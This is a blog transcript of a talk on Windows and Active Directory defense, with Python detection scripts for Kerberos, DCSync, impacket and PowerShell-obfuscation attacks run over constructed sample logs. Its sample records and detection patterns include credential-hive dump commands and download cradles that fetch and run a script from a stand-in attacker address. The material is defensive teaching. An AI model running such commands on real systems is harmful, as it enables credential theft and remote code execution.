Intro to Windows & AD Defense
Adam Hassan / October 2024 (968 Words, 6 Minutes)
This is part 3/3 of my Windows Week series that I did for UFSIT
Transcript:
Windows & AD Defense: How to win
What is this talk?
Basics of Windows logging
How to come up with your own detections
Me enumerating different attacks and how to defend against them (this part will be less structured…)
My methodology: if possible, you want to patch everything and STOP attacks altogether. In fast-paced competitions like CCDC, this isn't possible.
As a backup, we want to log when something happens. Bug from 2020 exploited? Yeah, you can patch it eventually (if you have time), but for now, log it. That way you can at least patch it after red team exploits it once. Better late than never.
Logging Basics
Group Policy
GPOs (Group Policy Objects): the tool that lets admins manage and configure operating systems, applications, and user settings.
Local Group Policy: applied only to the local machine; configurations affect individual devices/users.
Domain Group Policy: managed centrally in Active Directory; applies settings across multiple users and devices in a network.
Example GPOs
Enable logging of:
  Bad logins (4625)
  TGTs and STs being requested (Audit Kerberos Authentication Service: 4768; Audit Kerberos Service Ticket Operations: 4769)
  Files being accessed (Audit Object Access / File System: 4663, plus a SACL on the files you care about)
  Certificates being requested (Audit Certification Services: 4886/4887)
  …
Success audits fire when something succeeds (e.g. a successful login); failure audits fire when it doesn't. Turn on both: the failed attempt is often the earlier warning.
Set password policy
Set the LAN Manager authentication level (refuse LM/NTLMv1; prefer Kerberos)
Disable the Guest account
Disable LLMNR
Set up firewalls on machines
Prevent USB storage from being used
Enable SMB signing
…
Event Viewer
Sysmon
Wazuh
My (unfinished) rules
https://github.com/Adamkadaban/wazoop/blob/main/Rules/Windows.xml
LDAPMonitor https://github.com/p0dalirius/LDAPmonitor
What could this be used for?
When I use BloodHound to do an attack and I add myself to a group, you can see the LDAP change (the group's member attribute).
Shadow Credentials technique: msDS-KeyCredentialLink changes.
When a password is changed: the pwdLastSet attribute changes.
…
This can also be used to detect:
  noPac (a new machine account appears, then its sAMAccountName is renamed)
  ZeroLogon (the DC computer account's password, and therefore its pwdLastSet, changes)
  Any domain privesc that has to write something into the directory
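The poll-and-diff idea behind LDAPmonitor, as an added Python example (mine, not LDAPmonitor's code and not from the talk): take two snapshots of the attributes you care about, diff them, and label the changes that map to the attacks above. The DNs, attribute values and the attribute-to-technique mapping are constructed for the example; in a real deployment the snapshots come from periodic LDAP searches against a DC.

```python
"""Poll-and-diff detection in the spirit of LDAPmonitor: snapshot the directory, diff, and
label the attribute changes that usually mean an attack is in progress."""

# Attribute -> what a change to it usually means (this mapping is my own, not LDAPmonitor's).
WATCHED = {
    "member": "group membership changed",
    "msDS-KeyCredentialLink": "Shadow Credentials (key credential added)",
    "pwdLastSet": "password changed or reset (ZeroLogon resets the DC account)",
    "sAMAccountName": "account renamed (noPac renames a machine account)",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "resource-based constrained delegation set",
    "servicePrincipalName": "SPN changed (targeted Kerberoasting)",
    "userAccountControl": "UAC flags changed (e.g. DONT_REQ_PREAUTH for AS-REP roasting)",
}

def diff_snapshots(before, after):
    """Return (dn, attribute, old, new) for every difference between two {dn: {attr: value}} snapshots.
    New and deleted objects are reported with the pseudo-attributes '*new*' and '*deleted*'."""
    changes = []
    for dn in sorted(set(before) | set(after)):
        old_obj, new_obj = before.get(dn), after.get(dn)
        if old_obj is None:
            changes.append((dn, "*new*", None, new_obj.get("objectClass")))
        elif new_obj is None:
            changes.append((dn, "*deleted*", old_obj.get("objectClass"), None))
        else:
            for attr in sorted(set(old_obj) | set(new_obj)):
                if old_obj.get(attr) != new_obj.get(attr):
                    changes.append((dn, attr, old_obj.get(attr), new_obj.get(attr)))
    return changes

def classify(changes):
    """Keep the changes worth an alert and say why; multi-valued attributes report what was added/removed."""
    alerts = []
    for dn, attr, old, new in changes:
        if attr == "*new*" and new and "computer" in new:
            alerts.append((dn, attr, "new machine account (MachineAccountQuota abuse?)"))
        elif attr in WATCHED:
            why = WATCHED[attr]
            if isinstance(old, list) and isinstance(new, list):
                why += f"; added={sorted(set(new) - set(old))} removed={sorted(set(old) - set(new))}"
            alerts.append((dn, attr, why))
    return alerts

# Constructed snapshots (not from a real domain) taken a few minutes apart.
ADMIN = "CN=Administrator,CN=Users,DC=lab,DC=local"
ALICE = "CN=alice,CN=Users,DC=lab,DC=local"
SNAPSHOT_T0 = {
    "CN=Domain Admins,CN=Users,DC=lab,DC=local": {"objectClass": ["group"], "member": [ADMIN]},
    "CN=bob,CN=Users,DC=lab,DC=local": {"objectClass": ["user"], "msDS-KeyCredentialLink": [],
                                        "pwdLastSet": "133700000000000000", "description": "Finance"},
    "CN=DC01,OU=Domain Controllers,DC=lab,DC=local": {"objectClass": ["computer"], "pwdLastSet": "133600000000000000"},
}
SNAPSHOT_T1 = {
    "CN=Domain Admins,CN=Users,DC=lab,DC=local": {"objectClass": ["group"], "member": [ADMIN, ALICE]},
    "CN=bob,CN=Users,DC=lab,DC=local": {"objectClass": ["user"],
                                        "msDS-KeyCredentialLink": ["B:828:0002...:CN=bob"],  # placeholder blob
                                        "pwdLastSet": "133700000000000000", "description": "Finance team"},
    "CN=DC01,OU=Domain Controllers,DC=lab,DC=local": {"objectClass": ["computer"], "pwdLastSet": "133700000000000000"},
    "CN=WKSTN-X7,CN=Computers,DC=lab,DC=local": {"objectClass": ["computer"], "sAMAccountName": "WKSTN-X7$"},
}

def ldap_alerts():
    return classify(diff_snapshots(SNAPSHOT_T0, SNAPSHOT_T1))

if __name__ == "__main__":
    for dn, attr, why in ldap_alerts():
        print(f"{dn}\n  {attr}: {why}")
```

The description change on bob is reported by the diff but not alerted on; the group-membership, Shadow Credentials, DC password reset and new machine account are. Polling interval is the trade-off: short enough to catch a change before the attacker uses it, long enough not to hammer the DC.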
BlueSpawn + AtomicRedTeam https://www.youtube.com/watch?v=-8QC0CdCbuc
Threat Hunting
AutoRuns (autoruns.exe)
Will attempt to find all Windows entries that cause something to automatically run: registry keys, services, scheduled tasks, startup programs…
Will not find everything.
Shows you whether something is digitally signed. Self-signed or not signed… kinda sus. Signed by Microsoft… probably fine (a valid signature is not proof of innocence, but an unsigned autorun is the right place to start).
Also lets you check every binary's hash against VirusTotal (and optionally upload unknown ones). This is SOOOO useful!!
Process Explorer (procexp.exe)
Will show you all processes on the computer, as a tree, so you can see who spawned what.
Same checks as AutoRuns: the signature column (self-signed or not signed… kinda sus; signed by Microsoft… probably fine) and the VirusTotal column. This is SOOOO useful!!
DETECTION!
DETECTION - Recon
SMB null and anonymous auth
These should probably be disabled… but we know that attackers are likely going to start with this. If you detect a null session, you know that IP address is trying to start an attack.
https://www.blumira.com/integration/how-to-disable-null-session-in-windows/
SMB Shares: how does netexec know which shares are writable? It tries to create (and then delete) a directory on each share. So one client asking for write access on every share in quick succession, visible with Detailed File Share auditing (5145), is the tell.
DETECTION - Initial Access
Think like a red teamer: what do attackers do when they first get access?
whoami
hostname
ipconfig
netstat
tasklist
systeminfo
net (user | group | use | localgroup)
cmd.exe /c …
powershell.exe -nop -ep bypass -w hidden -enc …
IEX / IRM download cradles
…
Log process creation with the command line (Security 4688 with "Include command line in process creation events", or Sysmon event 1) and look for several of these from one host within a minute or two, not for any single one.
DETECTION - Kerberos Tickets
Kerberoasting & AS-REP roasting
What does an attacker do when they Kerberoast? They look for users that have SPNs set, so let's look for that.
LDAP query: (servicePrincipalName=*)
Impacket (GetUserSPNs.py) sends this query by default, but it can be turned off, so pair it with the ticket-request detection.
Impacket, netexec, and Rubeus will request STs for ALL SPN accounts by default. Let's detect a high number of distinct STs (4769) requested by one account in a short window.
Kerberoasting & AS-REP roasting (pt2)
When attackers Kerberoast or AS-REP roast, they will often request a downgraded ticket. By default, Windows issues tickets with e-type 18 (AES256-CTS-HMAC-SHA1-96, logged as 0x12). These are hard to crack, so attackers ask for e-type 23 (RC4-HMAC, logged as 0x17), which is keyed directly with the NT hash. Let's detect all TGTs (4768) and STs (4769) with weak encryption. For AS-REP roasting the 4768 also shows Pre-Authentication Type 0.
Caveat: accounts whose msDS-SupportedEncryptionTypes only allows RC4 get RC4 tickets legitimately, so baseline your domain first.
Golden and Silver Ticket attacks
Windows, when issuing tickets, gives them a 10-hour lifetime by default (Kerberos policy: "Maximum lifetime for user ticket"). Impacket's ticketer.py defaults to 10 years. A ticket that outlives the policy was not issued by your DC.
Usually, a user only has a TGT because they requested one (4768). A forged TGT never passed through a DC, so if an account is using tickets (4769) but no DC logged a 4768 for it, perhaps they forged it themselves?
Golden and Silver Ticket attacks (pt2)
When forging a ticket, attackers will often pass in the NT hash, because it is easier to get. Windows by default uses the AES key, which is harder to get. A ticket built from the NT hash is RC4-encrypted, so let's detect any ticket using RC4 (0x17) instead of AES (0x12).
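The three Kerberos checks from the slides above (Kerberoasting bursts, RC4 downgrades, and service tickets with no TGT behind them) as one added Python example. This is my code, not the author's Wazuh rules; the events are constructed to look like DC Security events 4768/4769 (field names follow the event XML), and the thresholds and the 10-hour lifetime are assumptions you would tune to your own domain.

```python
"""Kerberos detections over DC Security events 4768 (TGT issued) and 4769 (service ticket issued):
kerberoasting bursts, RC4 downgrades, and service tickets with no preceding TGT (forged TGT)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17     # TicketEncryptionType as logged in 4768/4769
AES256 = 0x12
TGT_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for user ticket" in Kerberos policy

def at(hhmm):
    return datetime(2024, 10, 1, *map(int, hhmm.split(":")))

def account(ev):
    # 4769 logs TargetUserName as user@REALM, 4768 as the bare name; normalise both
    return ev["TargetUserName"].split("@")[0].lower()

# Constructed sample events (not real logs).
EVENTS = [
    # alice: normal AES logon, then one service ticket for a file server
    {"EventID": 4768, "Time": at("08:00"), "TargetUserName": "alice", "IpAddress": "10.0.0.21", "TicketEncryptionType": AES256},
    {"EventID": 4769, "Time": at("08:01"), "TargetUserName": "alice@LAB.LOCAL", "ServiceName": "FS01$", "IpAddress": "10.0.0.21", "TicketEncryptionType": AES256},
    # bob: kerberoasting, RC4 tickets for every SPN-bearing user account within a minute
    {"EventID": 4768, "Time": at("09:00"), "TargetUserName": "bob", "IpAddress": "10.0.0.99", "TicketEncryptionType": AES256},
    *[{"EventID": 4769, "Time": at("09:01"), "TargetUserName": "bob@LAB.LOCAL", "ServiceName": svc, "IpAddress": "10.0.0.99", "TicketEncryptionType": RC4_HMAC}
      for svc in ("svc_sql", "svc_web", "svc_backup", "svc_ftp", "svc_report")],
    # Administrator: service ticket request backed by a TGT no DC ever issued (golden ticket)
    {"EventID": 4769, "Time": at("10:30"), "TargetUserName": "Administrator@LAB.LOCAL", "ServiceName": "DC01$", "IpAddress": "10.0.0.99", "TicketEncryptionType": RC4_HMAC},
]

def kerberoast_candidates(events, min_services=5, window=timedelta(minutes=5)):
    """Accounts that pulled service tickets for >= min_services distinct user-account services inside `window`.
    Machine accounts (name$) and krbtgt are skipped: their keys are not what Kerberoasting cracks."""
    by_user = defaultdict(list)
    for ev in events:
        svc = ev.get("ServiceName", "")
        if ev["EventID"] == 4769 and not svc.endswith("$") and svc.lower() != "krbtgt":
            by_user[account(ev)].append(ev)
    hits = set()
    for who, evs in by_user.items():
        evs.sort(key=lambda e: e["Time"])
        for i, first in enumerate(evs):
            services = {e["ServiceName"] for e in evs[i:] if e["Time"] - first["Time"] <= window}
            if len(services) >= min_services:
                hits.add(who)
    return hits

def rc4_service_tickets(events):
    """Service tickets issued with RC4 for user-account services: the downgrade attackers ask for.
    Caveat: accounts whose msDS-SupportedEncryptionTypes only allow RC4 produce these legitimately."""
    return [ev for ev in events
            if ev["EventID"] == 4769 and ev["TicketEncryptionType"] == RC4_HMAC and not ev["ServiceName"].endswith("$")]

def tickets_without_tgt(events):
    """4769s whose account has no 4768 in the preceding TGT lifetime. A forged TGT never hits a DC,
    so it never produces a 4768. Needs the Security logs of *every* DC, or other DCs cause noise."""
    tgts = [ev for ev in events if ev["EventID"] == 4768]
    return [ev for ev in events if ev["EventID"] == 4769 and not any(
        account(tg) == account(ev) and timedelta(0) <= ev["Time"] - tg["Time"] <= TGT_LIFETIME for tg in tgts)]

if __name__ == "__main__":
    print("kerberoast:", kerberoast_candidates(EVENTS))
    print("rc4 STs:", [(account(e), e["ServiceName"]) for e in rc4_service_tickets(EVENTS)])
    print("ST without TGT:", [(account(e), e["IpAddress"]) for e in tickets_without_tgt(EVENTS)])
```

The ST-without-TGT check is the one that needs the most care: it only works if you collect 4768 from all DCs (a client may get its TGT from one DC and its service tickets from another), and renewals past the original lifetime look the same as a forgery unless you also track 4770.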
DETECTION - Credentials
DCSync (NTDS)
DCSync does not read ntds.dit: it asks a DC to replicate account secrets over DRSUAPI, the same way another DC would. Reading ntds.dit directly (ntdsutil, a shadow copy) is a separate credential-dump technique, and for that one we can look for file read access to ntds.dit. What else can we look for?
DCSync (NTDS), continued
With Audit Directory Service Access enabled and a SACL on the domain object, a replication request logs a 4662 whose Properties list the control-access rights DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). We expect only domain controller machine accounts (and known sync accounts such as Entra Connect's) to do this; anyone else is DCSyncing.
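An added Python example of the 4662 check (mine, not the talk's rules): pull the control-access GUIDs out of the Properties field and alert when a principal outside the allow-list exercises a replication right. The 4662 records below are constructed; the DC names and the sync-account name in the allow-list are assumptions for this lab.

```python
"""Flag DCSync: directory replication rights exercised (Security event 4662) by anything that is not a DC."""
import re

# Control-access-right GUIDs that appear in the 4662 "Properties" field during replication.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Assumed allow-list for this lab: DC computer accounts plus a directory-sync service account.
EXPECTED_REPLICATORS = {"dc01$", "dc02$", "msol_sync"}

def replication_rights(properties):
    """Names of the replication rights referenced in a 4662 Properties string."""
    return sorted(REPL_RIGHTS[g.lower()] for g in GUID.findall(properties) if g.lower() in REPL_RIGHTS)

def dcsync_alerts(events):
    """(account, rights) for every 4662 where a principal outside the allow-list pulled replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev["Properties"])
        who = ev["SubjectUserName"].lower()
        if rights and who not in EXPECTED_REPLICATORS:
            alerts.append((who, rights))
    return alerts

# Constructed sample records (not real logs). Properties mirrors the multi-line layout Windows uses.
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectName": "DC=lab,DC=local", "Properties": REPL_PROPS},   # normal replication
    {"EventID": 4662, "SubjectUserName": "alice", "ObjectName": "DC=lab,DC=local", "Properties": REPL_PROPS},   # DCSync
    {"EventID": 4662, "SubjectUserName": "bob", "ObjectName": "CN=bob,CN=Users,DC=lab,DC=local",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},   # ordinary access, placeholder GUID
    {"EventID": 4624, "SubjectUserName": "alice"},   # unrelated event, ignored
]

if __name__ == "__main__":
    for who, rights in dcsync_alerts(EVENTS):
        print(f"DCSync by {who}: {', '.join(rights)}")
```

Matching on the GUIDs rather than on the resolved right names keeps the rule working regardless of the log language, and the allow-list is deliberately a short explicit set: a new DC or a new sync account is a change you want to notice.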
SAM & LSA
We can look for commands like this:
reg.exe save hklm\sam C:\temp\sam.save
reg.exe save hklm\system C:\temp\system.save
reg.exe save hklm\security C:\temp\security.save
(Seen in 4688 or Sysmon 1 with the command line; key on the hive names, not on the C:\temp path, which the attacker chooses.)
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8
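Command-line detection logic for the two slides above that list what to look for in 4688/Sysmon 1 records: the first-access recon commands (with PowerShell's -nop/-ep bypass/-w hidden/-enc flags) and the reg.exe hive saves. This is an added Python example, not the author's rules; the events are constructed, including the base64 payload, which is built in the block so you can see what the decoder recovers. Tags per command plus a "burst" check over recon commands per host, since any single whoami is noise.

```python
"""Command-line detections for 4688 / Sysmon 1 records: recon bursts, PowerShell flags with
decoding of -EncodedCommand, and SAM/SECURITY/SYSTEM hive dumps via reg.exe."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

RECON = re.compile(r"\b(?:whoami|hostname|ipconfig|netstat|tasklist|systeminfo|quser|nltest|net1?\s+(?:user|group|localgroup|use))\b", re.I)
PS_FLAGS = re.compile(r"(?:^|\s)-(?:nop|noprofile|noni|noninteractive|ep\s+bypass|executionpolicy\s+bypass|w\s+hidden|windowstyle\s+hidden)\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the argument is base64 of UTF-16LE text
ENC_CMD = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(r"\b(?:IEX|Invoke-Expression|IRM|Invoke-RestMethod|IWR|Invoke-WebRequest|DownloadString)\b", re.I)
HIVE_DUMP = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if there is none (or it does not decode)."""
    m = ENC_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def tag_command(cmdline):
    """Labels for one command line; the decoded script, if any, is scanned with the same rules."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    tags = []
    if RECON.search(text):
        tags.append("recon")
    if PS_FLAGS.search(text):
        tags.append("powershell-flags")
    if decoded is not None:
        tags.append("encoded-command")
    if CRADLE.search(text):
        tags.append("download-cradle")
    if HIVE_DUMP.search(text):
        tags.append("hive-dump")
    return tags

def recon_bursts(events, min_cmds=3, window=timedelta(minutes=2)):
    """Hosts on which >= min_cmds distinct recon commands ran inside `window`: what a fresh shell does first."""
    by_host = defaultdict(list)
    for ev in events:
        if "recon" in tag_command(ev["CommandLine"]):
            by_host[ev["Computer"]].append(ev)
    hosts = set()
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["Time"])
        for i, first in enumerate(evs):
            cmds = {e["CommandLine"].split()[0].lower() for e in evs[i:] if e["Time"] - first["Time"] <= window}
            if len(cmds) >= min_cmds:
                hosts.add(host)
    return hosts

def at(hhmm):
    return datetime(2024, 10, 1, *map(int, hhmm.split(":")))

# Constructed sample records (not real logs); the encoded payload is built here, not copied from a capture.
ENC = base64.b64encode("IEX (IRM http://10.0.0.99/a.ps1)".encode("utf-16-le")).decode()
EVENTS = [
    {"Time": at("09:00"), "Computer": "WS01", "CommandLine": "whoami /all"},
    {"Time": at("09:00"), "Computer": "WS01", "CommandLine": "hostname"},
    {"Time": at("09:01"), "Computer": "WS01", "CommandLine": "ipconfig /all"},
    {"Time": at("09:01"), "Computer": "WS01", "CommandLine": "cmd.exe /c net user /domain"},
    {"Time": at("09:02"), "Computer": "WS01", "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"Time": at("09:05"), "Computer": "WS01", "CommandLine": r"reg.exe save hklm\sam C:\temp\sam.save"},
    {"Time": at("11:00"), "Computer": "WS02", "CommandLine": "ipconfig /all"},   # a helpdesk one-off
    {"Time": at("11:00"), "Computer": "WS02", "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["Computer"], tag_command(ev["CommandLine"]), ev["CommandLine"][:60])
    print("recon bursts:", recon_bursts(EVENTS))
```

WS02's lone ipconfig gets a "recon" tag but no burst, which is the point of the second function: alert on the pattern, not the token. Decoding -enc before matching matters because the flags alone say nothing about what runs; the cradle only becomes visible in the decoded text.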
DETECTION - Lateral Movement
evil-winrm
The User-Agent from evil-winrm starts with the string "Ruby WinRM Client", e.g. Ruby WinRM Client (2.8.3, ruby 3.2.2 (2023-03-30)).
If you block this, red team could use other tools (like the official WinRM client), but evil-winrm itself would be blocked or detected.
psexec / wmiexec / smbexec / atexec / dcomexec
psexec starts a service that runs an uploaded malicious .exe, so detect ALL new services (System 7045). This isn't something that happens often.
smbexec is the same, but makes a .bin instead of a .exe.
impacket by default will name the uploaded binary [A-Za-z]{8}.exe
wmiexec works by using WMI and DCOM to communicate with a cmd.exe or powershell.exe child process: detect suspicious children of wmiprvse.exe
atexec works with scheduled tasks (Security 4698), but doesn't spawn an interactive shell; tasks are placed in the temp directory with name [A-Za-z]{8}
dcomexec uses DCOM with RPC to execute commands: look for shells as child processes of mmc.exe
https://regex101.com/
https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/
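The impacket patterns from the slide above, turned into one hunt over System 7045, Security 4698 and Sysmon 1 records, as an added Python example (mine, not the talk's rules). The events are constructed; the name patterns follow the slide and impacket's defaults, which an operator can change with a flag, so treat a match as a lead, not proof.

```python
"""Hunting impacket-style execution in System 7045 (new service), Security 4698 (new scheduled task)
and Sysmon 1 (process create) records."""
import re

EIGHT_LETTERS = re.compile(r"^[A-Za-z]{8}$")
RANDOM_BINARY = re.compile(r"[\\/]([A-Za-z]{8})\.(?:exe|bin)(?:[\s\"]|$)", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Parents that have no business spawning a shell, and the impacket tool that makes them do it
SHELL_SPAWNERS = {"wmiprvse.exe": "wmiexec-style (WMI/DCOM)", "mmc.exe": "dcomexec-style (MMC20.Application)"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def hunt(events):
    """Return (event_index, reason) pairs for everything worth a look."""
    hits = []
    for i, ev in enumerate(events):
        kind = (ev["Log"], ev["EventID"])
        if kind == ("System", 7045):
            # every new service is rare enough to review; the 8-letter random name is the impacket giveaway
            # (legit 8-letter service names exist too, e.g. WazuhSvc, so the name only raises the priority)
            reason = "new service installed"
            if RANDOM_BINARY.search(ev["ImagePath"]) or EIGHT_LETTERS.match(ev["ServiceName"]):
                reason += " with impacket-style random name"
            hits.append((i, reason))
        elif kind == ("Security", 4698):
            if EIGHT_LETTERS.match(ev["TaskName"].lstrip("\\")):
                hits.append((i, "scheduled task with 8-letter random name (atexec-style)"))
        elif kind == ("Sysmon", 1):
            parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
            if child in SHELLS and parent in SHELL_SPAWNERS:
                hits.append((i, f"{child} spawned by {parent}: {SHELL_SPAWNERS[parent]}"))
    return hits

# Constructed sample records (not real logs).
EVENTS = [
    {"Log": "System", "EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe"},   # an admin install
    {"Log": "System", "EventID": 7045, "ServiceName": "gXbQ", "ImagePath": r"%SystemRoot%\KjHsdPQw.exe"},
    {"Log": "Security", "EventID": 4698, "TaskName": r"\MicrosoftEdgeUpdateTaskMachineCore"},
    {"Log": "Security", "EventID": 4698, "TaskName": r"\bRtXmQpL"},
    {"Log": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1727776800.1 2>&1"},
    {"Log": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"Log": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\System32\mmc.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /Q /c hostname"},
]

if __name__ == "__main__":
    for i, reason in hunt(EVENTS):
        print(i, reason)
```

The Sysmon install still shows up as "new service installed" on purpose: the slide's point is that every 7045 is reviewable, and the random-name check only decides how loudly it should page you.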
DETECTION - Delegation
What is delegation? Kerberos delegation allows a service to access other services on behalf of domain users.
Attackers often have to create a machine account to exploit it (RBCD needs an account with an SPN that they control). Look for LDAP reads of ms-DS-MachineAccountQuota, and for new machine accounts on the domain (4741).
You can limit these attacks by adding sensitive users to the Protected Users group (their credentials can't be delegated), or marking them "Account is sensitive and cannot be delegated", and by setting ms-DS-MachineAccountQuota to 0.
DETECTION - Defense Evasion
Powershell obfuscation
This executes malicious code!
Luckily, we have PowerShell logging!
Script Block Logging (event 4104): records blocks of code as they are executed. Since each layer is logged as the code de-obfuscates itself, every step ends up in the log.
Transcription: records all input and output in PowerShell, exactly as shown to the user.
Turn on Module Logging (4103) as well; all three live under Administrative Templates > Windows Components > Windows PowerShell.
https://devblogs.microsoft.com/powershell/defending-against-powershell-attacks/
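A small scorer for 4104 ScriptBlockText, as an added Python example (mine, not Revoke-Obfuscation and not from the talk), showing why script block logging pays off: the outer obfuscated layer scores high on structural features (backticks, [char] casts, string concatenation), and the inner layer that logging captures after de-obfuscation scores on what it actually does (IEX plus a download cradle). The three records are constructed, and the feature set, weights and threshold are my assumptions to tune against your own baseline.

```python
"""Score PowerShell script blocks (event 4104 ScriptBlockText) for obfuscation indicators.
Because script block logging records each layer as it is de-obfuscated, the same execution
yields both a punctuation-heavy outer layer and a readable inner layer; both get flagged here."""
import re

# Feature regexes in the spirit of Revoke-Obfuscation's feature extraction (my own, simplified set).
FEATURES = {
    "backticks":      re.compile(r"`"),
    "char_casts":     re.compile(r"\[char\]", re.I),
    "string_concat":  re.compile(r"'\s*\+\s*'|\"\s*\+\s*\""),
    "join_or_format": re.compile(r"-join\b|-f\s", re.I),
    "invoke":         re.compile(r"\b(?:iex|invoke-expression)\b|[&.]\s*\(\s*\$", re.I),
    "base64":         re.compile(r"FromBase64String|-enc", re.I),
    "download":       re.compile(r"\b(?:DownloadString|Invoke-WebRequest|IWR|Invoke-RestMethod|IRM|Net\.WebClient)\b", re.I),
}
WEIGHTS = {"backticks": 2, "char_casts": 2, "string_concat": 1, "join_or_format": 2,
           "invoke": 3, "base64": 3, "download": 3}   # assumed weights

def features(script):
    counts = {name: len(rx.findall(script)) for name, rx in FEATURES.items()}
    specials = sum(1 for c in script if not c.isalnum() and not c.isspace())
    counts["special_ratio"] = round(specials / max(len(script), 1), 2)
    return counts

def obfuscation_score(script):
    """Weighted indicator count; each regex feature is capped at 5 hits so one trick cannot dominate."""
    f = features(script)
    score = sum(WEIGHTS[name] * min(f[name], 5) for name in WEIGHTS)
    if f["special_ratio"] > 0.35:          # punctuation-heavy text is rarely hand-written admin code
        score += 5
    return score

def flag_script_blocks(events, threshold=6):
    """(index, score) of 4104 records at or above the threshold."""
    return [(i, obfuscation_score(ev["ScriptBlockText"]))
            for i, ev in enumerate(events)
            if ev["EventID"] == 4104 and obfuscation_score(ev["ScriptBlockText"]) >= threshold]

# Constructed 4104 records (not real logs): an admin one-liner, an obfuscated download cradle as the
# attacker typed it, and the de-obfuscated inner layer that script block logging also captures.
EVENTS = [
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem -Path C:\Logs -Filter *.evtx | Sort-Object LastWriteTime"},
    {"EventID": 4104, "ScriptBlockText": "$a=('Ne'+'w-Ob'+'ject');$b=[char]73+[char]69+[char]88;$u='ht'+'tp://10.0.0.99/a.ps1';"
                                         ".($b)((&$a Net.WebClient).\"Down`loadString\"($u))"},
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/a.ps1')"},
]

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, obfuscation_score(ev["ScriptBlockText"]), features(ev["ScriptBlockText"]))
    print("flagged:", flag_script_blocks(EVENTS))
```

Note that the keyword regex for DownloadString misses the backtick-split "Down`loadString" in the outer layer; the structural features catch that layer anyway, and the keyword catches the inner one. That redundancy is the reason to log every layer rather than only the command line.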
CyberForce pt1
CyberForce pt2
DEF CON 25 - Daniel Bohannon, Lee Holmes - Revoke Obfuscation: PowerShell Obfuscation
https://github.com/danielbohannon/Revoke-Obfuscation
YARA
File detection: write a rule for detecting static attributes in a binary, based on hashes, metadata, strings, bytes, file size, imports.
Dissecting a Rule
Lots of malware techniques: bypassing AMSI via memory patching, payload encryption, sleep obfuscation, import obfuscation, API hashing, direct syscalls, indirect syscalls, stack spoofing…
https://hackback.zip/2024/05/05/Hiding-in-plain-sight-survey-of-edr-evasion-techniques.html
How to make your own detections
Make your own homelab! Game of Active Directory (GOAD), Detection Lab. Set up Wazuh, Velociraptor, Sysmon, ELK, … then run the attacks against it and write the rule that catches each one.
https://hackback.zip/